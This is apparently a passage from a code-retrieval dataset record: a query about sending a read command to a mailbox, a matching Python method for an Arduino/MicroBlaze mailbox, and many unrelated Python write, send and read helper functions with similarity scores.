self.Port.writable():\n #print \"\\nwriting \" + cmd + \" to port...\"\n for c in str(cmd):\n self.Port.write(c)\n self.Port.write(\"\\r\\n\")\n\n return", "def write(self, msg):\n # Transmit messages using the serial connection. Encodes strings to byte-arrays\n self.Serial.write(msg.encode('ascii'))", "def send_command(self, data, read_delay=1):\n self._write(data)\n if read_delay:\n time.sleep(read_delay)\n return self._read()", "def write(self, command):\n if not command.endswith('\\n'):\n command += '\\n'\n self.rpc.call(MsfRpcMethod.ConsoleWrite, [self.cid, command])", "def write_message_to_pipe(writehandle, channel, data):\n # Construct the dictionary\n mesg_dict = {\"ch\":channel,\"d\":data}\n\n # Convert to a string\n mesg_dict_str = marshal.dumps(mesg_dict)\n\n # Make a full string\n mesg = str(len(mesg_dict_str)) + \":\" + mesg_dict_str\n\n # Send this\n index = 0\n while index < len(mesg):\n bytes = os.write(writehandle, mesg[index:])\n if bytes == 0:\n raise EnvironmentError, \"Write send 0 bytes! Pipe broken!\"\n index += bytes", "def send(self, message):\n\n if self._inchild:\n os.write(self._general_pw_child, message)\n else:\n os.write(self._general_pw_parent, message)", "def on_write(message):\n print('Write received', message)\n body = json.loads(message.body)\n try:\n db_write(body['key'], body['value'])\n finally:\n message.ack()", "def reply_message(self, message):\n\n message = str(message).format(self.path).encode('utf-8')\n self.wfile.write(message)", "def send(self,msg):\n try:\n if self.mutexCmd.tryLock(100):\n self.cmd.append(msg)\n self.mutexCmd.unlock()\n #print(\"ADD TO QUEUE: {}\".format(msg))\n else:\n print(\"WARN: cmd not added to queue\")\n except Exception as e:\n print(\"ERROR:Serial:send:\",e)\n self.ConnexionError.emit(True)", "async def write(self, towrite: bytes, await_blocking=False):\n\n await self._write(towrite)\n\n # Wait for the output buffer to be flushed if requested\n if await_blocking:\n return await self.flush()", "def write(self, command):\n self.cmd_emiter.emit(str(command))\n self.meas.write(command)", "def send_command(self, data):\n try:\n self.write(data)\n reply = self.read_line()\n \n if reply == \"{}\":\n pass\n else:\n print \"send_command: received bad reply %s\" % (reply)\n sys.exit(1)\n except Exception:\n raise", "async def write(self, msg: Union[str, bytes]) -> None:\n if isinstance(msg, bytes):\n self.writer.write(msg)\n else:\n self.writer.write(msg.encode(\"utf-8\"))\n self.writer.write(b\"\\n\")\n await self.writer.drain()", "async def _send_command(self, command):\n send_message = \"\"\n\n for i in command:\n send_message += chr(i)\n result = None\n for data in send_message:\n if self.serial_port is not None:\n try:\n result = self.write(data)\n except():\n logerr('Cannot send command')\n return result", "def send(self, message):\n pass", "def send(self, command):\n self.transport.write(command.to_json())\n self.transport.write(\"\\n\")", "def _write(self, location, data):\n self._connector.write(location=location, data=data)", "def _write(self, data):\n if not self.connected:\n raise IOError(\"Not connected.\")\n\n if len(data + b'\\r\\n') > self.MAX_MESSAGE_SIZE:\n logger.error(\n \"A message wasn't sent to %r because it was larger than %d \"\n \"bytes (that is MAX_MESSAGE_SIZE). Consider raising that \"\n \"value if the message seemed legit.\", self._repr_remote(),\n self.MAX_MESSAGE_SIZE)\n # No need to call finalize.\n raise IOError(\"Message too long.\")\n\n try:\n with self._write_lock:\n if not self.connected:\n raise IOError(\"Not connected.\")\n # Does the same as self._socket.sendall.\n self._writer.write(data + b'\\r\\n')\n self._writer.flush()\n except socket.error as error:\n self.finalize(\"Write failed.\")\n logger.warning(\"Failed writing to socket: %s.\", error)\n raise error", "def write(self, buffer):\n self.msg(\"send %r\", buffer)\n self.channel.sendall(buffer.decode())", "def write(self,command,ser = None):\n if ser is None:\n ser = self.ser\n if ser is not None:\n self.flush(ser = ser)\n ser.write(command)\n debug(\"%s: Sent %r\" % (ser.name,command))", "def send_as_server(self, command, msg):\n self._write(f':{self.server.name} {command} {msg}')", "def send_command(self, command):\n question = jbus.jbus_generator_data_write(self.node, 0x15b0, bytes([0x00,command]))\n answer = self.send_request(question)\n #print(\"Question: [\", question, \"]\")\n #print(\"Answer: [\",answer,\"] LEN: \",len(answer))\n return self.verify_response(question, answer)", "def send_command(self, cmd):\n\n\t\tself.eyetribe._connection.request(cmd)", "def _send(self, command, payload):\n self.work_queue_client.send(command, payload)", "def write(self, command):\n self.stdin_stream.write(command)\n self.stdin_stream.flush()", "def __write(self, command):\n command += \"\\00\"\n self.file_write.write(command.encode('latin-1'))", "def _send_command(self, command):\n command_sequence = [command, self._checksum(command)]\n\n for retry in range(0, self.__RETRY_MAX_NUM):\n bytes_sent = self._port_handle.write(command_sequence)\n if bytes_sent != len(command_sequence):\n raise DfuException('Serial port write error: tried to send {} '\n 'bytes, but {} was '\n 'sent.'.format(len(command_sequence),\n bytes_sent))\n\n if self._is_acknowledged():\n break\n\n self._port_handle.flushInput()\n self._port_handle.flushOutput()\n else:\n raise DfuException(\n 'Command {} failed after '\n '{} retries.'.format(hex(command), retry + 1))", "def write(self, command):\n # Write command in bytes plus newline then flush.\n self.proc.stdin.write(bytes(command + \"\\n\", 'ascii'))\n self.proc.stdin.flush()\n\n self.genout()", "def send_command(self, cmd):\n self.mgen_pipe.Send(cmd)", "def send_message(self, cmd_id, message_type, status, message=None):\n pass", "def ftp_write(slot: int, data: bytes, **ftp_options) -> str:\n return _ftp_readwrite(slot, False, data, **ftp_options)", "def write(message):\n __terminalState.osSupport.print(message)", "def send_command(self):\n if self.serial.is_open:\n try:\n # Unicode strings must be encoded\n data = bytes(self.command + '\\r\\n', encoding='utf-8')\n self.serial.flushInput()\n self.serial.write(data)\n except Exception as ex:\n self.handle_serial_error(ex)\n else:\n raise IOError('Try to send data when the connection is closed')", "def write(self, msg):\n if self._writer is None:\n raise NotImplementedError(\"Function not available while socket is closed.\")\n self._writer.write(msg)\n self._writer.flush()", "def send(self, data):\r\n\r\n self._serial_object.write(data)", "def _send(self, what, value, address='localhost:502', **kwargs):\n\n colon_index = address.find(':')\n IP = '-i {} '.format(address[:colon_index])\n PORT = '-p {} '.format(address[colon_index+1:])\n # NOTE: following data is validated by client script\n MODE = '-m {} '.format('w')\n TYPE = '-t {} '.format(what[0])\n OFFSET = '-o {} '.format(what[1]) # NOTE: 0-based\n\n # NOTE: value is a list of bools or ints when write multiple times\n if 'count' in kwargs and kwargs['count'] > 1:\n count = kwargs['count']\n COUNT = '--count {} '.format(count)\n else:\n count = 1\n COUNT = '--count {} '.format(count)\n\n # NOTE: value is a int when writing to a register\n if what[0] == 'HR':\n if count == 1:\n VALUE = '-r {} '.format(value)\n else:\n VALUE = '-r '\n for v in value:\n VALUE += str(v)\n VALUE += ' '\n\n # NOTE: value is a bool when writing to a coil\n elif what[0] == 'CO':\n if count == 1:\n if value == True:\n VALUE = '-c {} '.format(1)\n else:\n VALUE = '-c {} '.format(0)\n else:\n VALUE = '-c '\n for v in value:\n if v == True:\n VALUE += str(1)\n else:\n VALUE += str(0)\n VALUE += ' '\n else:\n raise ValueError('IR and DI are read only data.')\n\n\n cmd = shlex.split(\n self._client_cmd +\n IP +\n PORT +\n MODE +\n TYPE +\n OFFSET +\n COUNT +\n VALUE\n )\n # print 'DEBUG modbus_send cmd shlex list: ', cmd\n\n # TODO: pipe stdout and return the sent value\n try:\n client = subprocess.Popen(cmd, shell=False)\n client.wait()\n\n except Exception as error:\n print('ERROR modbus _send: ', error)", "def send(self, command):\n if hasattr(self, 'connection'):\n if self.connection.is_open:\n cmd = '<'+command+'>'\n # bytestring conversion\n bytestr = str.encode(cmd)\n self.connection.write(bytestr)\n else:\n # TODO be more explicit what failed to be sent\n utils.printer(\"%s is not connected\" % self.name, 'error')", "def sendChatMessage(self, msg):\n self.transport.write(msg)", "def write():\n pass", "def SendCommand(self,command):\n\t\tself.acad.ActiveDocument.SendCommand(command)", "def _send_command(self, command, data=None):\n self._spi_write(_SPI_COMMAND, [command])\n if data is not None:\n self._send_data(data)", "def write(self, command):\n self.meas.write(command)", "def send_and_flush(self, msg):\r\n try:\r\n self.bus.send(msg)\r\n msg.data[:4] = bytearray(4)\r\n # print(\"Message sent on {}\".format(self.bus.channel_info))\r\n except can.CanError:\r\n print(\"Message NOT sent\")", "def write(self):\n # build up all commands into a single request to increase network perf\n connection = self.connection\n commands = self.commands\n try:\n connection.send_packed_command(connection.pack_commands([c.args for c in commands]))\n except ConnectionError as e:\n for c in commands:\n c.result = e", "def check_write_command(self, line):\n self.E_str = \"check_write_command\"\n err_msg = \"The write command takes the syntax:\\n\\n\\twrite <data_name> <filepath>\"\n err_msg += \"\\n\\nor you could specify the type of file to write via:\\n\\n\\t\"\n err_msg += \"write <data_name> <filepath> as <file_type>\"\n\n words = line.split()\n if len(words) != 3 and len(words) != 5:\n self.print_error(err_msg)\n words[1] = words[1].lstrip('$')\n line = ' '.join(words)\n\n line, any_vars = self.find_vars_in_str(line)\n words = line.split()\n words = self.fix_words(words)\n\n # Check the variable to be written actually exists\n if words[1] not in self.variables:\n self.print_error(f\"I can't find the data named: '{words[1]}'\")\n\n # Check we know how to write the requested filetype\n if len(words) == 5:\n if words[4] not in f_dicts.write_fncs:\n err_msg = \"I don't know how to write that type of file.\\n\\n\"\n err_msg += \"Please use one of:\\n\\t*\"\n err_msg += \"\\n\\t*\".join(list(f_dicts.write_fncs.keys()))\n self.print_error(err_msg)\n\n self.files_written.append(gen_parse.rm_quotation_marks(words[2]))\n\n # Need to check requested filetype and if that isn't in write_fncs then raise Error", "def sendCommand(self,command,message):\n \n msg_temp = command + \" \" + message +'\\n'\n msg = msg_temp.encode('UTF-8')\n self.socket.send(msg)", "def sendCommand(self,command,message):\n \n msg_temp = command + \" \" + message +'\\n'\n msg = msg_temp.encode('UTF-8')\n self.socket.send(msg)", "def send_message(self, message):\n pass", "def write(self, command):\n self.meas.write(command)", "def writeln(message):\n write(message + \"\\n\")", "def sendCommand(self, command:str=\"?\"):\n self.commandQueue.put(command)\n #self.queueLock.release()\n pass", "def send_command(self, command):\n self.enable_serial_port(self.port)\n time.sleep(.2)\n self.serial_com.write(command.encode() + b'\\r\\n')\n time.sleep(.2)", "def send(self, msg):\n pass", "def send(self, msg):\n pass", "def send(self, msg):\n pass", "def __send(self, cmd, delay=.1):\n\n self.__write(cmd)\n\n if delay is not None:\n print(\"wait: %d seconds\" % delay)\n time.sleep(delay)\n\n return self.__read()", "def async_write(self, data) -> None:\n if data and self.__is_active:\n # logging.info('async_write: ' + str(data))\n self.__client_socket.async_write_all(data, self.__async_write_callback)\n\n # logging.info('async_write done')", "def send(self, send_to, subject):\n self.server.send_message(self, send_to, subject)", "def setWriteOp(self, writeBuffer):\r\n try:\r\n self._checkAssert(0)\r\n self.writer = self.tlsConnection.writeAsync(writeBuffer)\r\n self._doWriteOp()\r\n except:\r\n self._clear()\r\n raise" ]
[ "0.6980138", "0.68226683", "0.6813809", "0.6756463", "0.66383994", "0.6596419", "0.6563577", "0.6360743", "0.6337061", "0.63311714", "0.6312822", "0.6311199", "0.62932336", "0.6277489", "0.6255314", "0.6235374", "0.62292373", "0.6213919", "0.62082815", "0.6193863", "0.61861074", "0.6169357", "0.61666536", "0.6164507", "0.6145252", "0.61371475", "0.61355793", "0.6133337", "0.61246514", "0.6119756", "0.61192393", "0.6085713", "0.60368085", "0.603445", "0.603445", "0.60308295", "0.6030624", "0.601454", "0.60126233", "0.60118204", "0.60085905", "0.59987336", "0.5996809", "0.59947985", "0.5991831", "0.5959241", "0.5947794", "0.594416", "0.5939276", "0.593598", "0.5920535", "0.5920052", "0.5920028", "0.5919447", "0.59187657", "0.590682", "0.5889928", "0.58744997", "0.5872558", "0.5851791", "0.5850621", "0.58423513", "0.5840391", "0.5836903", "0.58317685", "0.5823548", "0.58233786", "0.5808959", "0.5807102", "0.5806321", "0.58033466", "0.58014166", "0.5800659", "0.57897604", "0.57830626", "0.5777785", "0.57732165", "0.57567894", "0.5742988", "0.5740192", "0.5735888", "0.5729403", "0.5725849", "0.5722809", "0.57205963", "0.57175195", "0.5717417", "0.5717417", "0.5709849", "0.5706409", "0.5690541", "0.5684075", "0.5667778", "0.5659994", "0.5659994", "0.5659994", "0.56582975", "0.5652002", "0.565094", "0.5648092" ]
0.646782
7
Send a read command to the mailbox.
def read_cmd(self, address, d_width=4, d_length=1, timeout=10): # Write the address self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_ADDR_OFFSET, address) # Build the read command cmd_word = get_cmd_word(READ_CMD, d_width, d_length) self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_CMD_OFFSET, cmd_word) # Wait for ACK in steps of 1ms countdown = timeout while not self.is_cmd_mailbox_idle() and countdown > 0: time.sleep(0.001) countdown -= 1 # If ACK is not received, alert users. if countdown == 0: raise RuntimeError("ArduinoDevMode read_cmd() not acknowledged.") result = self.microblaze.read(MAILBOX_OFFSET + MAILBOX_PY2IOP_DATA_OFFSET) return result
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def read(self):\n if self.status == 'read':\n return\n self.status = 'read'\n self.emit('read')\n self.emit('modified')", "def read(self, read):\n\n self._read = read", "def mifare_read(self,address):\n return self.in_data_exchange(bytearray([MIFARE_COMMAND_READ,address]))", "def read(self, request, *args, **kwargs):\n message = self.get_object()\n # Skip reading / unreading own messages\n if request.user.id != message.user_id:\n if request.method == 'POST':\n message.mark_as_read(request.user)\n elif request.method == 'DELETE':\n message.mark_as_unread(request.user)\n return Response(status=status.HTTP_202_ACCEPTED)", "def send_read_request(self, start_position):\n\tsend_data = struct.pack(\"!6I\", 0b1101, 0b0001, self.epoch_no, self.handle_no, start_position, self.NUM_BYTES_TO_READ)\n\tself.client_socket.sendto(send_data, self.address)\t\n\treturn", "def read():\n print(command(\"R\"))", "async def Read(self) -> Optional[Message]:\n return await self._read_queue.Get()", "def read(self, request, *args, **kwargs):\n conversation = self.get_object()\n if request.method == 'POST':\n conversation.mark_as_read(request.user)\n elif request.method == 'DELETE':\n conversation.mark_as_unread(request.user)\n return Response(status=status.HTTP_202_ACCEPTED)", "def doRead(self):\n if self.read_scheduled is not None:\n if not self.read_scheduled.called:\n self.read_scheduled.cancel()\n self.read_scheduled = None\n\n while True:\n if self.factory is None: # disconnected\n return\n\n events = self.socket_get(constants.EVENTS)\n\n if (events & constants.POLLIN) != constants.POLLIN:\n return\n\n try:\n message = self._readMultipart()\n except error.ZMQError as e:\n if e.errno == constants.EAGAIN:\n continue\n\n raise e\n\n log.callWithLogger(self, self.messageReceived, message)", "def receive(self, message_length=100):\n\n if self._inchild:\n return os.read(self._general_pr_child, message_length)\n else:\n return os.read(self._general_pr_parent, message_length)", "def run(self):\n\n if (self.action == 'read'):\n self.read()\n else:\n self.write()", "def test_get_message_read(self):\n message = mommy.make(\n 'connectmessages.Message', thread=self.thread, sender=self.sender)\n user_thread = UserThread.objects.get(\n thread=self.thread, user=self.user)\n user_thread.read = True\n user_thread.save()\n thread = Thread.public.by_user(user=self.user)[0]\n messages = thread.messages_for_user(self.user)\n self.assertEqual(messages[0], message)\n self.assertTrue(messages[0].read)", "def msg_chan_read(channel, version = NATIVE_HEADER_VERSION, order=\"<\"):\n return message_with_reply(CHAN_READ, channel, \"\", version, order)", "def read(self, cmd):\n return self.device.query(cmd).rstrip(\"\\n\")", "async def send_command_and_read_reply(self, command: Protocol1Command) -> str:\n command.target_pump_num = self.address\n return await self.pump_io.write_and_read_reply_async(command)", "def send_command(self, data, read_delay=1):\n self._write(data)\n if read_delay:\n time.sleep(read_delay)\n return self._read()", "def recv(self, timeout=None):\n raise NotImplementedError(\"Trying to read from a write only bus?\")", "def read(self):\n return self.rpc.call(MsfRpcMethod.ConsoleRead, [self.cid])", "def read(self, n):\n msg = self.readexactly(n)\n n2 = n - len(msg)\n if n2 > 0:\n msg += self.readbuf(n2)\n return msg", "def receive_command(self):\n if self.serial.is_open:\n return self.serial.read(999).decode('utf-8')\n self.serial.flush()", "def test_toread_command(self):\r\n bm = BmarkMock()\r\n updated = ToRead.run(bm)\r\n self.assertTrue(\r\n 'toread' in updated.tags,\r\n \"Updated bmark should have 'toread' tag set\")", "def test_toread_in_commandset(self):\r\n COMMANDLIST['!toread'] = ToRead\r\n\r\n bm = BmarkMock()\r\n bm.tags['!toread'] = True\r\n commander = Commander(bm)\r\n updated = commander.process()\r\n\r\n self.assertTrue(\r\n 'toread' in updated.tags,\r\n \"Should have the toread tag in the updated bookmark\")\r\n self.assertTrue(\r\n '!toread' not in updated.tags,\r\n \"Should not have the !toread tag in the updated bookmark\")", "def read(self,count=None, ser = None):\n from time import time\n ##debug(\"read count=%r,ser=%r\" % (count,ser))\n if ser is None:\n ser = self.ser\n if ser is not None:\n #print(\"in wait:\" + str(self.ser.inWaiting()))\n debug(\"Trying to read %r bytes from %s...\" % (count,ser.name))\n ser.timeout = self.timeout\n reply = ser.read(count)\n debug(\"%s: Read %r\" % (ser.name,reply))\n self.last_reply_time = time()\n else: reply = \"\"\n return reply", "def get(self, cmd, wait_sleep=0.3) -> bytes:\n logger.debug(f\"get(cmd={cmd}, wait_sleep={wait_sleep})\")\n self.write(cmd)\n result = self.read(wait_sleep=wait_sleep)\n return result", "def read(self):\n from x84.bbs import getch\n from x84.bbs.session import getsession\n from x84.bbs.output import echo\n session = getsession()\n self._quit = False\n echo(self.refresh())\n while not self.quit:\n echo(self.process_keystroke(getch()))", "def _read(self):\n if not self.connected:\n raise IOError(\"Not connected.\")\n\n try:\n with self._read_lock:\n if not self.connected:\n raise IOError(\"Not connected.\")\n data = self._reader.readline(self.MAX_MESSAGE_SIZE)\n # If there weren't a \"\\r\\n\" between the last message\n # and the EOF we would have a false positive here.\n # Luckily there is one.\n if len(data) > 0 and not data.endswith(b\"\\r\\n\"):\n logger.error(\n \"The client sent a message larger than %d bytes (that \"\n \"is MAX_MESSAGE_SIZE). Consider raising that value if \"\n \"the message seemed legit.\", self.MAX_MESSAGE_SIZE)\n self.finalize(\"Client misbehaving.\")\n raise IOError(\"Message too long.\")\n except socket.error as error:\n if self.connected:\n logger.warning(\"Failed reading from socket: %s.\", error)\n self.finalize(\"Read failed.\")\n raise error\n else:\n # The client was terminated willingly; its correct termination\n # is handled in disconnect(), so here we can just return.\n return b\"\"\n\n return data", "def readMail(m, msgNum):#Read a particular email\n resp, data = m.fetch(msgNum, \"(RFC822)\")\n email_body = data[0][1]\n mail = email.message_from_string(email_body)\n #temp = m.store(emailid,'+FLAGS', '\\\\Seen')\n m.expunge()\n\n\n return mail", "def query(self, command):\r\n self.ser_io.write(command+'\\r')\r\n return self.ser_io.readline()", "def trigger_item_read(self, checked):\n if self.selected_item and checked == self.selected_item.unread:\n if self.selected_item.unread:\n self.selected_item.mark_as_read()\n else:\n self.selected_item.mark_as_unread()\n self.controller.item_read(self.selected_item)", "def test_isread_command(self):\r\n bm = BmarkMock()\r\n bm.tags['toread'] = True\r\n updated = IsRead.run(bm)\r\n self.assertTrue(\r\n 'toread' not in updated.tags,\r\n \"Updated bmark should not have 'toread' tag set\")", "async def _read_reply_async(self) -> str:\n reply_string = await self._serial.readline_async()\n logger.debug(f\"Reply received: {reply_string}\")\n return reply_string.decode(\"ascii\")", "def handle_read(self):\n packet = self.recv(8192)\n if packet == \"\":\n #print \"[WARNING] Socket closed by remote host %s:%s\" % (\n # self.address,self.port)\n self.close()\n return\n packet_list = messages.separate_messages(packet)\n #received_types = \" + \".join(\n # messages.get_message_type(messages.parse(packet))\n # for packet in packet_list)\n #print \"From %s:%s received: \" % (self.address, self.port), received_types\n # Process a single message at a time\n for packet in packet_list:\n message = messages.parse(packet)\n if messages.get_message_type(message) == \"OFPT_ECHO_REQUEST\":\n self.buffer.append(messages.of_echo_reply)\n else:\n self.handle_message(message)", "def read(self):\r\n assert self.status in (WAIT_LEN, WAIT_MESSAGE)\r\n if self.status == WAIT_LEN:\r\n self._read_len()\r\n # go back to the main loop here for simplicity instead of\r\n # falling through, even though there is a good chance that\r\n # the message is already available\r\n elif self.status == WAIT_MESSAGE:\r\n read = self.socket.recv(self.len - len(self.message))\r\n if len(read) == 0:\r\n logging.error(\"can't read frame from socket (get %d of %d bytes)\" %\r\n (len(self.message), self.len))\r\n self.close()\r\n return\r\n self.message += read\r\n if len(self.message) == self.len:\r\n self.status = WAIT_PROCESS", "def read():\n # TODO", "def read(self, length=1024):\n\n return self.socket.recv(length)", "def inReadEvent(self):\r\n try:\r\n self._checkAssert()\r\n if self.handshaker:\r\n self._doHandshakeOp()\r\n elif self.closer:\r\n self._doCloseOp()\r\n elif self.reader:\r\n self._doReadOp()\r\n elif self.writer:\r\n self._doWriteOp()\r\n else:\r\n self.reader = self.tlsConnection.readAsync(16384)\r\n self._doReadOp()\r\n except:\r\n self._clear()\r\n raise", "def read(self, length = 1024):\n\n return self.socket.recv(length)", "def read(self, length = 1024):\n\n return self.socket.recv(length)", "def read(self):\n assert self.status in (WAIT_LEN, WAIT_MESSAGE)\n\n if self.status == WAIT_LEN:\n self._read_len()\n # go back to the main loop here for simplicity instead of\n # falling through, even though there is a good chance that\n # the message is already available\n elif self.status == WAIT_MESSAGE:\n read = self.socket.recv(self.len - len(self.message))\n if len(read) == 0:\n logging.error(\"can't read frame from socket\" +\n \" (got %d of %d bytes)\" %\n (len(self.message), self.len))\n self.close()\n return\n self.message += read\n if len(self.message) == self.len:\n self._set_status(WAIT_PROCESS)", "async def read(self, *, decode: bool = ...) -> bytes:\n ...", "def _rc_get(self, cmd, buffersize=0):\n if not cmd.endswith('\\n'):\n cmd = cmd + '\\n'\n cmd = cmd.encode()\n self.SOCK.sendall(cmd)\n # allways read at least 2 bytes!\n answer = self.SOCK.recv(buffersize + 2)\n return answer.decode('utf-8').split('\\r\\n> ')[0]", "def on_read(conn, message):\n body = json.loads(message.body)\n print('Read received', body)\n with Producer(conn) as producer:\n try:\n value = db_read(body['key'])\n print('Db read', body['key'], value)\n producer.publish(\n {'result': value},\n exchange='',\n routing_key=message.properties['reply_to'],\n correlation_id=message.properties['correlation_id'],\n serializer='json',\n retry=True)\n finally:\n message.ack()", "def read(self, *args, **kwargs):\n return self.limitedstream.read(*args, **kwargs)", "def query(self):\n self.bus.write('@\\x51\\r\\n')\n response = self.bus.read(23)\n return response", "def read_pipe(self, read_data):\n self.logger.info(read_data)", "async def read(self,\n n: int = -1\n ) -> bytes:\n if n == 0:\n return b''\n\n future = asyncio.Future()\n try:\n self._read_queue.put_nowait((future, False, n))\n return await future\n\n except aio.QueueClosedError:\n raise ConnectionError()", "def ask(self, command, query_delay=0):\n self.write(command)\n self.wait_for(query_delay)\n return self.read()", "def ask(self, message):\n\n self.write(message)\n\n if self.multi_command is None:\n return self.read()\n else:\n self.responses_expected += 1", "def is_raw_read(command): \n if command.startswith('<READ') and command.endswith('>') and \\\n is_valid_raw(command):\n return True\n else: \n return False\n # end if", "def select(self, path, rw=True):\n return self._getMailbox(path)", "def _on_read(self, line):\n # Some game logic (or magic)\n line = line.strip()\n logger.info(\"RCV> %s\", line)\n if not line:\n self.stream.close()\n return\n\n self.stream.write(\"echo: %s\\n\" % line)\n\n # Wait for further input on this connection\n self.wait()", "def doRead(self):\n return fdesc.readFromFD(self.fileno(), self.protocol.dataReceived)", "def read(self, *args, **kwargs):\n pass", "def wait_till_read_out():\n\n\trespond = send_command('waitreadout')", "def read(self):\n self.attributes = self.call('READ', expect=error.OK)", "def send(self, jlink):\n ack = super(ReadRequest, self).send(jlink)\n\n # Write the read command, then read the data and status.\n jlink.swd_write32(0x0, 0x0)\n jlink.swd_write8(0xFC, 0x0)\n status = jlink.swd_read8(ack) & 7\n data = jlink.swd_read32(ack + 3)\n\n if status == Response.STATUS_ACK:\n # Check the parity\n parity = jlink.swd_read8(ack + 35) & 1\n if util.calculate_parity(data) != parity:\n return Response(-1, data)\n\n return Response(status, data)", "def select(self, path, rw=False):\n return self._getMailbox(path)", "async def readline(self) -> bytes:\n ...", "def read(fd, name, *args, version=None, **kwargs):\n\treturn access('read', fd, name, *args, version=version, **kwargs)", "def read(self, size=None, timeout_ms=None, **kwargs):\n raise NotImplementedError(\"implement in derived transport class\")", "def read(self, len, timeout = 0):\n if timeout < 0:\n timeout = 0\n else:\n timeout += _timeout\n\n try:\n return self._snc.read(len, timeout)\n except Exception as e:\n log.error(\"failed to read [len={0}]:\\n{1!r}\" .\n format(len, e))\n raise Error", "def startReading(self):\n self.reading = True\n self.thread = ReadSocket(self)\n self.thread.start()", "def query(self,command = None,count=1,ser = None):\n from time import time\n from time import sleep\n if ser is None:\n ser = self.ser\n\n if ser is not None:\n t1 = time()\n self.write(command)\n i = 0\n while self.waiting(ser)[0] != count:\n if i >int(self.timeout/0.015):\n break\n sleep(0.015)\n i+=1\n reply = self.read(ser = ser,count=count)\n t2 = time()\n self.last_command_execution_time = t2-t1\n self.last_reply_time = time()\n else:\n reply = ''\n return reply", "def execute_read(function):\n raise NotImplementedError(\"execute_read() has not been implemented\")", "async def read(self, adr):\n await self.busy.acquire()\n \n if not self.is_reset:\n await self.reset_ev.wait()\n self.reset_ev.clear()\n \n self._access_req(adr, 0, 0, 0)\n \n await self.ack_ev.wait()\n self.ack_ev.clear()\n \n self.busy.release()\n \n return self.dat_i", "def read(self, command):\n return self.meas.read(command)", "async def exec_read(self, query, *args, only_one=False):", "def read(self, nbytes: int, write: int = 0x00, /) -> bytes:", "def read(self, nbytes: int, write: int = 0x00, /) -> bytes:", "async def read(self, n: int) -> bytes:\n await self.wait_for_read()\n try:\n return self.socket.recv(n)\n except ConnectionResetError:\n self.logger.debug(\"Connection reset\")\n raise asyncio.TimeoutError", "def _send_command(self, command):\n command = \"%s\\n\" % (command.strip())\n self.server.write(command)\n self.server.flush()\n\n #read the length of the result\n length = int(self.server.readline())\n output = self.server.read(length)\n\n result = pickle.loads(output)\n if result[0] == 'ok':\n return result[1]\n else:\n raise RobotCommandError(str(result))", "def receiveMessage(self,size):\n self.messageReceived = self.com.getData(size)\n print('+--------------------------------+')\n print('| Mensagem Recebida |')\n print('+--------------------------------+')\n print(self.messageReceived)", "def _recv(self):\n return self._channel.recv(_MAX_READ_AMOUNT)", "def read(self, count):\n d = self.sock.recv(count, socket.MSG_WAITALL)\n assert len(d) == count\n return d", "def read(self, **kwargs):\n pass", "def read(self, delay, cmd):\n \n buf = []\n seeking_sync = True;\n seeking_end = True;\n\n time.sleep(delay)\n # Read serial into buffer and then pop out to s for return\n while self.ser.inWaiting() > 0:\n ch = self.ser.read(1) #Read 1 BYTE\n \n if seeking_sync:\n if ch == chr(2): # <STX>\n seeking_sync = False\n elif seeking_end:\n if ch == chr(6): # <ACK>\n buf.append(chr(6))\n seeking_end = False\n else:\n buf.append(ch)\n \n ### These checks should be moved to send like the other serial classes\n if not buf: # No reply received\n debugRow = 'arduinoSerial:: Sent_Cmd: ' + cmd + ' No reply!'\n self.dbF.writerow([debugRow])\n if DEBUG: print debugRow\n return False\n elif buf[-1] != chr(6): # Check for ACK character\n debugRow = 'arduinoSerial:: Sent_Cmd: ' + cmd + ' ACK not found!'\n self.dbF.writerow([debugRow])\n if DEBUG: print debugRow\n return False \n else:\n cmd = buf[0] # First entry is command\n # Comma separated data stored in list\n data = ''.join(buf[1:-1]).split(',') \n return cmd, data", "def make_read_request(file_offset=1, byte_count=MAX_READ):\n return StenoPacket(\n packet_id=StenoPacket.ID_READ,\n p1=file_offset,\n p2=byte_count,\n )", "def mark_messages_read(self, mbox, msgset):\n self._add_flag(mbox, msgset, r'(\\Seen)')", "def read(self, n):\n assert self._read_future is None, \"Concurrent reads detected\"\n\n read_future = Future(self._loop)\n\n if self._unread_bytes or self._eof_recvd:\n read_future.set_result(self._unread_bytes)\n self._unread_bytes = b''\n else:\n self._read_future = read_future\n def read_future_done(_):\n self._read_future = None\n read_future.add_done_callback(read_future_done)\n\n return read_future", "async def _read(self, n):\n return await self._reader.readexactly(n)", "def read(self):\n return self.block.read()", "def run(self):\n self.read_from_serial()", "def _get_data(self, read_size):\n if NIX:\n return super(Keyboard, self)._get_data(read_size)\n return self._pipe.recv_bytes()", "def read(self, msg, ans_len):\n self.write(msg)\n # Length is sum of header(2), length, check, cmd, ans_len and end\n length = 6 + ans_len\n ans = self.sock.recv(length)\n if self.__check(ans):\n return ans[4:-2]\n return None", "def read(self, client):\n log(\"Reading from %s\" % self, self.opt)\n return client.read(self.path)", "def Read(self, *args, **kwargs):\n pass", "def stdin_read(self, data):\n self.write_master(data)", "def _execute(self, message):\n logging.info(__name__ + ' : Send the following command to the device: %s' % message)\n self.visa_handle.write('@%s%s' % (self._number, message))\n sleep(70e-3) # wait for the device to be able to respond\n result = self._read()\n if result.find('?') >= 0:\n print(\"Error: Command %s not recognized\" % message)\n else:\n return result", "def read(self, command):\n return self.meas.read(command)", "def read(self, command):\n return self.meas.read(command)", "def handle_read(self):\n while True:\n try:\n content = self.recv(1024)\n if content:\n self.rbuf.write(content.decode('utf-8'))\n if len(content) < 1024:\n break\n except Exception as e:\n print(e)\n self.handle_rpc()", "def read(self):\n pass", "def pub_serial_read():\n pub = rospy.Publisher('serial_reader', String, queue_size=10)\n while not rospy.is_shutdown():\n recv=serial_read(useParse=True)\n if recv != '':\n rospy.loginfo(recv)\n pub.publish(recv)\n else:\n pass\n print 'Closing...'", "def get(self, id):\n return read_msg(id)", "def _get_data(self, read_size):\n return self._character_device.read(read_size)", "def send(self, message):\n if not hasattr(message, '__iter__'):\n self.socket.send(message, constants.NOBLOCK)\n else:\n for m in message[:-1]:\n self.socket.send(m, constants.NOBLOCK | constants.SNDMORE)\n self.socket.send(message[-1], constants.NOBLOCK)\n\n if self.read_scheduled is None:\n self.read_scheduled = reactor.callLater(0, self.doRead)", "def read(self, bytes_to_receive=512, **kwargs):\n who_send = kwargs.get(\"who_send\", None)\n data = None\n if(self._type_connection == \"COM\"):\n data = self._connection.read(bytes_to_receive)\n else:\n msg = \"99, Error al recibir por la conexion 